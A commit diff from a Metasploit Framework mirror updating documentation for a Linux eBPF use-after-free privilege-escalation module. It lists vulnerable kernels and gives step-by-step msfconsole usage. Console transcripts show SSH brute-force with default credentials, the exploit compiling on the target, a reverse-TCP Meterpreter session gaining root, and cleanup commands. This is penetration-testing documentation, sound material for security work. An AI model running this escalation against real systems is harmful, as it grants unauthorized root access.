infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update documentation

GSoC/Meterpreter_Web_Console
Brendan Coles 2018-12-15 05:41:40 +00:00
parent b8e134b95d
commit a7b5737980
1 changed files with 80 additions and 129 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

205
documentation/modules/exploit/linux/local/bpf_priv_esc.md
View File

@ -1,167 +1,118 @@
## Notes
This module (and the original exploit) are written in several parts: `hello`, `doubleput`, and `suidhelper`.
Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF)
does not properly reference count file descriptors, resulting
in a use-after-free, which can be abused to escalate privileges.
Mettle at times on this exploit will give back an invalid session number error. In these cases `payload/linux/x64/shell/bind_tcp` seemed to always work.
The target system must be compiled with `CONFIG_BPF_SYSCALL`
and must not have `kernel.unprivileged_bpf_disabled` set to 1.
As of PR submission, the original shell becomes unresposive when the root shell occurs. Metasm fails to compile due to `fuse.h` being required.
As of PR submission, killing of the process `hello` and `doubleput` has to occur manually. `/tmp/fuse_mount` also needs to be unmounted and deleted.
## Vulnerable Application
This module has been tested successfully on:
This module was not tested against, but may work against:
* Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
* Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
* Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
* Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=82
* Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)
## Creating A Testing Environment
There are a few requirements for this module to work:
1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
3. fuse needs to be installed (non-default on Ubuntu 16.04 (Linux 4.4.0-38-generic))
1. `CONFIG_BPF_SYSCALL=y` must be set in the kernel (default on Ubuntu 16.04)
2. `kernel.unprivileged_bpf_disabled` can't be set to `1` (default on Ubuntu 16.04)
3. fuse needs to be installed (non-default on Ubuntu 16.04)
Using Ubuntu 16.04, simply `sudo apt-get install fuse` and you're all set!
This module has been tested against:
The `libfuse-dev` package must be installed to test live-compiling on the target:
1. Ubuntu 16.04 linux-image-4.4.0-38-generic (pre-compile & live compile)
2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic (pre-compile & live compile)
`apt-get install libfuse-dev=2.9.4-1ubuntu3.1`
This module was not tested against, but may work against:
1. Fedora 24 < [kernel-4.5.4-300.fc24](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
2. Fedora 23 < [kernel-4.5.5-201.fc23](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
3. Fedora 22 < [kernel-4.4.10-200.fc22](https://bugzilla.redhat.com/show_bug.cgi?id=1334311)
4. Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=823603)
5. Ubuntu 14.04.1 <= [4.4.0-22.39](https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1578705/comments/3)
## Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
4. Do: `use exploit/linux/local/bpf_priv_esc`
5. Do: `set session #`
6. Do: `set verbose true`
7. Do: `exploit`
3. Do: `use exploit/linux/local/bpf_priv_esc
4. Do: `set session #`
5. Do: `set verbose true`
6. Do: `exploit`
## Options
**MAXWAIT**
The first stage of this priv esc can take ~35seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to 120 (seconds)
The first stage of this priv esc can take ~35 seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to `120` (seconds)
**WritableDir**
A folder we can write files to. Defaults to /tmp
A folder we can write files to. Defaults to `/tmp`
**COMPILE**
If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto
If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto`
## Scenarios
### Ubuntu 16.04 (with Linux 4.4.0-38-generic)
#### Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.199.130
rhosts => 192.168.199.130
msf auxiliary(ssh_login) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login) > set password ubuntu
password => ubuntu
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-38-generic #57-Ubuntu SMP Tue Sep 6 15:42:33 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.199.131:39175 -> 192.168.199.130:22) at 2016-09-27 12:25:31 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#### Escalate
### Ubuntu 16.04 (with Linux 4.4.0-21-generic)
In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.
msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
msf exploit(bpf_priv_esc) > set verbose true
verbose => true
msf exploit(bpf_priv_esc) > set session 1
session => 1
msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
lhost => 192.168.199.131
msf exploit(bpf_priv_esc) > exploit
```
msf5 > use exploit/linux/local/bpf_priv_esc
msf5 exploit(linux/local/bpf_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/bpf_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/bpf_priv_esc) > run
[*] Started reverse TCP handler on 192.168.199.131:4444
[+] CONFIG_BPF_SYSCAL is set to yes
[+] kernel.unprivileged_bpf_disabled is NOT set to 1
[+] fuse is installed
[+] libfuse-dev is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing hello to /tmp/hello.c
[*] Max line length is 65537
[*] Writing 2760 bytes in 1 chunks of 9767 bytes (octal-encoded), using printf
[*] Writing doubleput to /tmp/doubleput.c
[*] Max line length is 65537
[*] Writing 5182 bytes in 1 chunks of 18218 bytes (octal-encoded), using printf
[*] Writing suidhelper to /tmp/suidhelper.c
[*] Max line length is 65537
[*] Writing 352 bytes in 1 chunks of 1219 bytes (octal-encoded), using printf
[*] Compiling all modules on target
[*] Writing payload to /tmp/AyDJSaMM
[*] Max line length is 65537
[*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
[*] Starting execution of priv esc. This may take about 120 seconds
[+] got root, starting payload
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2412016 bytes) to 192.168.199.130
[*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:43734) at 2016-09-27 12:26:06 -0400
[*] Cleaning up...
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] Kernel version 4.4.0-21-generic appears to be vulnerable
[+] fuse package is installed
[+] /tmp/fuse_mount doesn't exist
[+] Kernel config has CONFIG_BPF_SYSCALL enabled
[+] Unprivileged BPF loading is permitted
[+] libfuse-dev is installed
[+] gcc is installed
[+] pkg-config is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/hello.c' (2682 bytes) ...
[*] Writing '/tmp/doubleput.c' (5168 bytes) ...
[*] Writing '/tmp/suidhelper.c' (333 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.FVfiRBKRDX7r' (285 bytes) ...
[*] Launching exploit. This may take up to 120 seconds.
[+] Success! set-uid root /tmp/suidhelper
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (861348 bytes) to 172.16.191.141
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.141:34804) at 2018-12-15 00:20:04 -0500
[+] Deleted /tmp/hello.c
[+] Deleted /tmp/hello
[+] Deleted /tmp/doubleput.c
[+] Deleted /tmp/doubleput
[+] Deleted /tmp/suidhelper.c
[+] Deleted /tmp/.FVfiRBKRDX7r
[+] Deleted /tmp/fuse_mount
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 192.168.199.130
OS : Ubuntu 16.04 (Linux 4.4.0-38-generic)
Architecture : x86_64
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.141
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
#### Escalate w/ pre-compiled binaries
It is possible to force pre-compiled binaries, however in this case we look at a system that doesn't have libfuse-dev (ubuntu) installed
msf auxiliary(ssh_login) > use exploit/linux/local/bpf_priv_esc
msf exploit(bpf_priv_esc) > set verbose true
verbose => true
msf exploit(bpf_priv_esc) > set session 1
session => 1
msf exploit(bpf_priv_esc) > set lhost 192.168.199.131
lhost => 192.168.199.131
msf exploit(bpf_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.199.131:4444
[+] CONFIG_BPF_SYSCAL is set to yes
[+] kernel.unprivileged_bpf_disabled is NOT set to 1
[+] fuse is installed
[-] libfuse-dev is not installed. Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Writing pre-compiled binarys to target
[*] Max line length is 65537
[*] Writing 9576 bytes in 1 chunks of 24954 bytes (octal-encoded), using printf
[*] Max line length is 65537
[*] Writing 13920 bytes in 1 chunks of 36828 bytes (octal-encoded), using printf
[*] Max line length is 65537
[*] Writing 8840 bytes in 1 chunks of 21824 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/AyDJSaMM
[*] Max line length is 65537
[*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
[*] Starting execution of priv esc. This may take about 120 seconds
[+] got root, starting payload
[-] This exploit may require process killing of 'hello', and 'doubleput' on the target
[-] This exploit may requires manual umounting of /tmp/fuse_mount via 'fusermount -z -u /tmp/fuse_mount' on the target
[-] This exploit may requires manual deletion of /tmp/fuse_mount via 'rm -rf /tmp/fuse_mount' on the target
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2412016 bytes) to 192.168.199.130
[*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:55522) at 2016-09-28 08:08:04 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0